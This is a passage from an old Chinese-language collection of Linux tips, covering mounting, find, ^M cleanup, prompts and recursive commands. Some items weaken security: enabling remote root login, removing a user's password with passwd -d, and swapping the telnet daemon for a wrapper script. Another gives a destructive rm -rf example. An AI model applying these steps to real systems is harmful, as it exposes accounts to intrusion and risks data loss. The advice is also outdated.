　　不过搜索路径可能会有些问题, 关机时你得直接进入/sbin 里去执行 shutdown

5、强行退出 X windows

　 有时候在 X 里由于程序出错鼠标键盘都不起作用, 这时候不用着急, 因为在Linux下几乎不会像在Win95里那样恶性死机, 你只须键入Ctrl+Alt+BackSpace键就可以回到字符界面下了。

6、查找文件

　　　　find 命令要加一些参数才能查到文件, 如:

　　　　　#find /usr -name XF86Setup -print

　　　　　 在/usr里查找文件XF86Setup

7、查看win98下的文件

　　 mount /dev/hda1 /mnt 不过要求是FAT16才成。

8、软驱的使用

　　如果是Linux 的ext2文件系统用如下命令:

　　　　#mount -t ext2 /dev/fd0 /mnt

　　dos格式的软盘则用命令:

　　　　#mount -t msdos /dev/fd0 /mnt

　　然后就可以在/mnt里访问软盘的内容了, 注意在取出软盘之前要先卸掉软盘上的文件系统,

　　　　#umount /mnt 否则会导致信息丢失.

　　软盘上建立文件系统可用如下命令:

　　　　#mke2fs /dev/fd0 1440

9、如何允许root用户远程登录

　　　　编辑/etc/securetty,加上ttyp2,ttyp3等。

　　　　注意，有严重的安全性问题！ 最好是用ssh(安全的shell)加su/sudo,而且用xterm的Secure Keyboard来做远程管理。

10、忘了root密码怎么办

　　　　　boot:linux -s

　　　　　bash#passwd

　　　　　修改密码即可！

11、如何取消用户密码

　　　　　passwd -d username 或直接修改/etc/passwd文件去掉密码即可

12、如何取消^M字符

　　当你FTP一些DOS文件到unix下时，你经常会看见每行文件后面有个讨厌的^M 字符， 有两个简单的方法可以取消它。

　　用"vi"打开此文件，在Command mode下敲入：

　　:%s/^V^M//g

　　或者，在UNIX SHELL下敲入:

　　sed 's/^V^M//g' foo > foo.new

13、去掉引导区内的lilo信息

　　 安装lilo后如果硬盘数量或分区情况有改变的话将导致硬盘不能启动，这时只须用软盘启动dos再运行 fdisk/mbr 即可。(这个方法还可清除任何引导区病毒)

14、定制帐号登录时的页面显示内容

方法一:

1. 把 /usr/etc/in.telnetd 改名为 in.telnetd.xx (随你高兴).

2. 写一个 shell script 取代 /usr/etc/in.telnetd, 而这 script 中可以在 exec /usr/etc/in.telnetd.xx 之前执行你想要的工作, banner 图形就在这里 show 出.

方法二:

1. 修改 /etc/inetd.conf 上的 "telnet" 的那一行的 /usr/etc/in.telnetd 改为另一个 shell script 的 full pathname, 由这个 script 去 show 出 banner 图形, 最後再执行 exec /usr/etc/in.telnetd. 依这二种方法也可引伸出其他方法, 或修改其他 daemon 或 utility.

15、用当前路径作提示符

　　对 bash 来说，在 .bashrc 里加一行：

　　　PS1="$PWD$"

　　对 tcsh 来说，在 .tcshrc 里加一行：

　　　set prompt="%/>"

16、查看 Linux 启动时的信息

　　Linux 启动时屏幕显示的信息来不及看清就一闪而过，如果对这些信息感兴趣的话可以在启动完后用命令 dmesg 查看。

17、一次处理一整个目录

　　Linux/UNIX 的很多常用命令如 rm ， cp 等都有一个参数---- -r ， 是递归的意思， 命令里加了参数 -r 就可以对目标目录及其下所有子目录进行操作，如：

　　rm -rf /test (f 是 force 意为强行) ，

　　该命令完全删除根目录下的子目录 test ，作用类似于 dos 下的 deltree ，当然使用这个命令时要特别小心。再如：

　　cp -r /test /test1 有类似 dos 下 xcopy /s 的作用chown和chgrp命令也可实现目录的递归处理，但参数为 -R，如：

　　　　chown ant * -R